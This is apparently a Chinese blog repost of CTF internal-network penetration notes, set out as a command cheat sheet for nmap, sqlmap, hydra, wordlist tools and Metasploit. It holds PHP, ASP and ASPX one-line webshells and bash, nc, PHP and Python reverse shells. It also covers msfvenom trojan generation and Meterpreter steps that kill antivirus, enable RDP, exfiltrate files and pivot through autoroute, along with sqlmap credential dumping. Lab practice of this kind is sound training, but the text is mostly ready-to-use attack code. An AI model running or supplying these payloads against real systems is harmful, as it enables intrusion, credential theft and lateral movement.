CTF内网渗透笔记[亲测有效]

CTF内网渗透笔记[亲测有效]一、漏洞挖掘相关工具的使用NMAP扫描工具使用1.扫描指定的IP范围nmap192.168.0.101-1102.扫描指定的IP网段nmap192.168.0.*exclude192.168.0.1003.扫描指定网址的操作系统类型(深度扫描)nmap-A192.168.0.101ornmap-O192.168.0.1014.扫描网络内活跃的主机(该命令会跳过端口扫描或检测)nmap-sP192.168.0.*5.快速扫描主

大家好,欢迎来到IT知识分享网。

一、漏洞挖掘相关工具的使用

NMAP扫描工具使用

1.扫描指定的IP范围

nmap 192.168.0.101-110 

2.扫描指定的IP网段

nmap 192.168.0.* --exclude 192.168.0.100

3.扫描指定网址的操作系统类型(深度扫描)

nmap -A 192.168.0.101

or

nmap -O 192.168.0.101

4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测)

nmap -sP 192.168.0.*

5.快速扫描主机开放的端口(nmap-services文件中的端口)

nmap -F 192.168.0.101

6.扫描特定的端口

nmap -p 80 192.168.0.101
nmap -p 80-160 192.168.0.101 

7.完整的深度扫描

nmap -sP 192.168.0.101/24
nmap -p 1-65535 -A 192.168.0.101

nmap -sS -Pn -T4 -p 1-65535 192.168.0.101
nmap -A -O -p 80 192.168.0.101

目录爆破工具的使用

1.Windows平台-使用御剑,下载地址

https://github.com/foryujian/yjdirscan

2.Linux平台-使用kali中的Dirb,命令:

dirb http://192.168.1.101 /usr/share/wordlists/dirb/big.txt 

kali自带图形化工具owasp-zap,命令:

root@kali:~# owasp-zap 

Sqlmap工具的使用

1.查找数据库

sqlmap -u "http://www.xxx.com/link.php?id=321" --dbs

2.查找表

sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname --tables

3.查找列

sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns

4.查找字段值

sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C "id,user,password" --dump

5.通过POST方式注入

sqlmap -u "http://www.xxx.com/login.asp" --data "Username=admin&Password=123456"

6.Sqlmap组合命令的使用

sqlmap -u “http://www.xxx.com” --data "Username=amdin&Password=123" --level 3 --dbms mysql

#暴力扫描
sqlmap -u “http://www.xxx.com” --level 5 --risk 3 --forms --dbs

密码爆破工具的使用

Windows平台使用Archpr

Kali Linux使用hydra

#Kali中自带字典位置
cd /usr/share/wordlist

#激活成功教程SSH
hydra -L user.txt -P pass.txt -t 2 -vV -e ns 192.168.124.10 ssh
#激活成功教程ftp
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
#激活成功教程teamspeak
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
#激活成功教程POP3
hydra -l muts -P pass.txt my.pop3.mail pop3

字典生成工具–Crunch(按规则生成)

#指令:crunch 最小位数 最大位数 指定生成范围
crunch 1 9 2324bin

相关参数

参数
-b number[type] 体积大小,比如-b 20mb
-c number 密码行数,比如-c 8000
-d number symbol 限制出现相同元素的个数(至少出现元素个数),-d 3就不会出现zzf ffffgggg之类的
-e sting 定义停止生成密码。比如 -e 222222:到222222停止生成密码
-o wordlist.txt 保存为
-p 定义密码元素
-t #定义输出格式
@代表小写字母
,代表大写字母
%代表数字
^代表符号
\代表空格

字典生成工具–Cewl(爬取)

#使用命令
cewl www.example.com -d -w dic.txt

字典生成工具–john

john --wordlist=dic.txt --stdout --rules > results.txt

子域名收集工具

Kali平台,使用subDomainsBrute,基于Python的脚本工具,也可以用于Windows平台

python subDomainsBrute.py www.example.com


 -f 指定字典扫描,默认使用自带的subnames.txt.
 --full 使用subnames_full.txt字典全量扫描
 -w 强制扫描
 -t 指定线程,默认256个
 -p 指定进程,默认6个
 -o 指定输出文件名,如scanResult.txt

Windows平台,使用Layer子域名挖掘机,提取码91ec

内网探测工具

Kali平台,使用F-NAScan,基于Python的脚本工具,也可以用于Windows平台

#使用示例
python NAScan.py -h 10.111.1
python NAScan.py -h 192.168.1.1-192.168.2.111
python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6
python NAScan.py -h ip.ini -p port.ini -npython NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6

-h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。
-p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017)
-m 指定线程数量 默认100线程
-t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。
-n 不进行存活探测(ICMP)直接进行扫描。

WordPress组件漏洞扫描

Kali平台,使用WPScan,命令:

#-e 枚举 u用户名 vp有漏洞的插件
wpscan -u 192.168.0.101/wordpress/ -e u,v,p

wpscan --url http://192.168.0.101 --wordlist=/root/dic.txt --username uname --threads  20

SMB协议漏洞扫描

SMB在kali平台可以使用enum4linux

#192.168.0.102为靶机ip
enum4linux 192.168.0.102
#login
smbclient //192.168.0.102/share$

#windows下获取共享资源
net use k:\\192.168.1.102\share$
#linux下获取共享资源
mount -t cifs -o username=' ', password=' ' //192.168.1.101/share$  /mnt

 

二、漏洞利用相关工具的使用

木马使用

常用的一句话木马

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

一句话反弹shell

bash -i >& /dev/tcp/192.168.0.101/4444 0>&1
#echo "bash -i >& /dev/tcp/192.168.0.112/1234 0>&1" | bash

nc -e /bin/bash -d 192.168.0.101 4444

#使用php反弹shell
php -r '$sock=fsockopen("192.168.0.101",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

#使用Python自调起shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
python /tmp/shell.py

Python服务器shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#攻击机ip和端口
s.connect(("192.168.0.101",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

组装图片木马

#使用Windows的Copy命令组装木马(/b"二进制文件",/a"ASCII码")
copy flag.jpg/b+hack.php/a hack.jpg

#高级姿势(解决木马无法作为PHP执行的问题)
<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?>'); ?>

Metaspolit使用

1、漏洞扫描

打开Metaspolit控制台

msfconsole

使用Metaspolit辅助模块进行信息收集

search portscan

使用tcp进行端口扫描

use auxiliary/scanner/portscan/tcp

开展扫描

show options

#参数设置示例
set rhost 192.168.0.101
set port  1-65535
set thread 100

#执行攻击
exploit

使用msf-nmap进行系统信息扫描

nmap -sV 192.168.80.100

常用模块整理

use auxiliary/scanner/portscan/tcp
set payload payload/windows/x64/meterpreter/reverse_tcp

2、选择攻击模块

#查看Windows平台的攻击模块
search name:windows

#查看等级为优秀的辅助模块 
#type用于筛选exploit/auxiliary/post,使用platform仅查看常用模块
search type:auxiliary platform

#选择攻击模块
use exploit/multi/http/glassfish_deployer 

3、控制session

制作木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.2 lport=5555 -f exe -o hack.exe

session指令

msf > sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ROOT-9743DD32E3  192.168.1.11:4444 -> 192.168.1.142:1063 (192.168.1.142)

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\
meterpreter > 

4、控制job

#对当前的工作进行操作
jobs -h  
#通过job id 来终结某个job
kill+jobid  

5、Windows靶机信息挖掘

查看当前系统信息

#获取当前系统信息
sysinfo
#获取当前用户名
getuid

关闭靶机防御

#关闭杀毒软件
run post/windows/manage/killav
#开启3389
run post/windows/manage/enable_rdp
#目标子网情况    
run post/windows/manage/autoroute    

操作靶机文件系统

#目标主机当前处于哪个目录    
pwd或getwd
#自己处于哪个目录  
getlwd
#搜索c盘下所有txt文件   
search -f *.txt -d c:\
#下载文件到本机root目录下  
download    c:\test.txt /root
#上传本机木马至目标C盘 
upload    /root/hack.exe c:    
#修改靶机文件权限
cacls filename /E /G system:F

6、Linux靶机信息挖掘

查看用户相关信息

 cat /etc/passwd

查找用户相关文件

find / -user root 2>/dev/null

下载靶机可疑文件

#192.168.0.102为kali攻击机ip
scp /root/pass/password.txt root@192.168.0.102:/root/

 7、内网渗透

反弹shell示例

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options 
msf5 exploit(multi/handler) > set lhost 192.168.0.2
msf5 exploit(multi/handler) > set lport 5555
msf5 exploit(multi/handler) > run

查看当前网段

meterpreter > run get_local_subnets 
 
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.10.20.1/255.255.255.0
Local subnet: 192.168.0.101/255.255.255.0

增加172.10.20.1网段至当前网段(使用autoroute)

meterpreter > run autoroute -s 172.10.20.0/24
 
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.10.20.0/255.255.255.0...
[+] Added route to 172.10.20.0/255.255.255.0 via 192.168.0.101
[*] Use the -p option to list all active routes

退出session,查看当前路由状态

meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > route print 
 
IPv4 Active Routing Table
=========================
 
   Subnet             Netmask            Gateway
   ------             -------            -------
   172.10.20.0        255.255.255.0      Session 1
 
[*] There are currently no IPv6 routes defined.

附手动添加路由

#查看跳板机所处网段:
meterpreter > run get_local_subnets 
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.20.10.0/255.255.255.0
Local subnet: 192.168.0.101/255.255.255.0
 
#将运行着的session退至后台:
meterpreter > background
[*] Backgrounding session 1...
 
#添加路由:
msf exploit(handler) > route add 172.20.10.0 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
IPv4 Active Routing Table
=========================
   Subnet             Netmask            Gateway
   ------             -------            -------
   172.20.10.0        255.255.255.0      Session 1
[*] There are currently no IPv6 routes defined.

 

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/24712.html

(0)

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注微信